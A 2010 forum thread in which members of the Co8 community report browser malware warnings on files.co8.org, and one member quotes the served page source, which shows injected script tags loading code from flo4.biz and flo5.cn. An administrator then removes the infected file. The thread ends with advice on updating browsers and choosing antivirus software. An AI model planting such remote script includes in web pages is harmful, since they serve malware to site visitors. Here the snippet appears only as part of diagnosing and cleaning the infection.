Please fix files.co8.org

DarkStorm · Jun 15, 2010

Hello,

for *weeks*, Chrome is showing me warnings whenever I open a thread with shiningted's avatar in it, because it is hosted in files.co8.org, which is infected by malware.

files.co8.org includes code from flo4.biz, which is a malware hoster.

Please clean this up!

Regards,
Storm

maggit · Jun 15, 2010

Yeah, I get that warning on Firefox whenever I want to download anything (soundtrack samples, or any files) as well. Perhaps something for Taluntain to check out?

Gaear · Jun 16, 2010

This is an old problem. Taluntain said that flo4.biz is not on our server, and that probably a neighboring IP on the network was infected and Google flagged ours as well.

Agetian has requested a review from Google a couple times now, and Google has responded that they've checked the site and found it clean, and that they'll remove the warning, but then they never do.

Not much else we can do. :shrug: It's sort of like dealing with the monolithic telephone or cable company.

DarkStorm · Jun 16, 2010

Gaear said: ↑

This is an old problem. Taluntain said that flo4.biz is not on our server, and that probably a neighboring IP on the network was infected and Google flagged ours as well.
Click to expand...

No, check files.co8.org.
This is the sourcecode of the page that is served when I go to files.co8.org:
Code:
<meta http-equiv="refresh" content="0; url=http://www.co8.org/forum"><script src=http://flo4.biz/1.txt></script><script src=http://flo5.cn/1.txt></script></script>
See that script include there? That's the malware inclusion part. Most likely scenario: co8.org was hacked and that snippet was put there to infect visitors of files.co8.org (most likely an automated hack/trojan, there are several out there that do something like this).

The only way to clean this up is to remove the offending code snippet from files.co8.org, *then* contact google (although google will most likely unflag files.co8.org once it respiders it).

Storm

Taluntain · Jun 16, 2010

That one file on the files subdomain (which is completely separate from the main Co8 site) actually was infected. Someone apparently uploaded the old, infected index at some point after the move of the files subdomain off the old server during the move of the files to the new server (probably via an old, infected backup - this file was clean when I checked it last). In any event, I've cleaned it up now, so it should all be fine. Sorry for the inconvenience and if you spot anything like that in the future, let us know directly!

GuardianAngel82 · Jun 17, 2010

Good police work! I'm glad something was finally found! :thumbsup:

I've never been a believer in the "false alarm".

Sitra Achara · Jun 18, 2010

Oh my!

Under what circumstances does that actually infect your computer?

Taluntain · Jun 18, 2010

AFAIK that site was shut down a long time ago. Such exploit redirects usually have a very short TTL so they just remain as annoyances. It's not an infection in the virus sense of the word.

Shiningted · Jun 19, 2010

Thanks Tal.

Good pickup Darkstorm, sorry I (also) suggested it was nothing to worry about :thumbsup:

DarkStorm · Jun 20, 2010

Sitra Achara said: ↑

Oh my!

Under what circumstances does that actually infect your computer?
Click to expand...

As pointed out already, the site was most likely down anyway.

Usually they exploit security vulnerabilities in your browser or any installed plugin to execute code on your computer. From there on, it works just like any other trojan/virus infection.

What helps: Keep your browser and any plugins (Especially Flash + Adobe Reader) up to date.

sirchet · Jun 20, 2010

Thanks guys, noted and appreciated.

I'll be keeping my stuff updated.

A question if I may?

Completely, well at least kind of off topic, what is your opinion of Windows Defender?

Can, should it be trusted? Is it enough by itself?

Thanks in advance.

DarkStorm · Jun 20, 2010

Is it enough by itself?
Click to expand...

Definetly not.

If you don't want to pay for Anti-Virus, and if you can live with a daily ad-popup on update, use Avira: http://www.avira.com/en/pages/index.php

It's quite good, really.

GuardianAngel82 · Jun 21, 2010

I wouldn't mind hearing more opinions on this.

ShadowDragoon · Oct 12, 2010

I prefer Avast! Antivirus, myself. (I know, poking an old thread with a stick... sorry...)

Log in or Sign up

Forums

Please fix files.co8.org

DarkStorm Established Member

maggit Zombie RipTorn Wonka

Gaear Bastard Maestro Administrator

DarkStorm Established Member

Taluntain Established Member Administrator

GuardianAngel82 Senior Member

Sitra Achara Senior Member

Taluntain Established Member Administrator

Shiningted The Thunder of Justice Administrator

DarkStorm Established Member

sirchet Force for Goodness Moderator Supporter

DarkStorm Established Member

GuardianAngel82 Senior Member

ShadowDragoon Advocate of Vengence

Log in or Sign up

Useful Searches

Please fix files.co8.org

DarkStorm Established Member

maggit Zombie RipTorn Wonka

Gaear Bastard Maestro Administrator

DarkStorm Established Member

Taluntain Established Member Administrator

GuardianAngel82 Senior Member

Sitra Achara Senior Member

Taluntain Established Member Administrator

Shiningted The Thunder of Justice Administrator

DarkStorm Established Member

sirchet Force for Goodness Moderator Supporter

DarkStorm Established Member

GuardianAngel82 Senior Member

ShadowDragoon Advocate of Vengence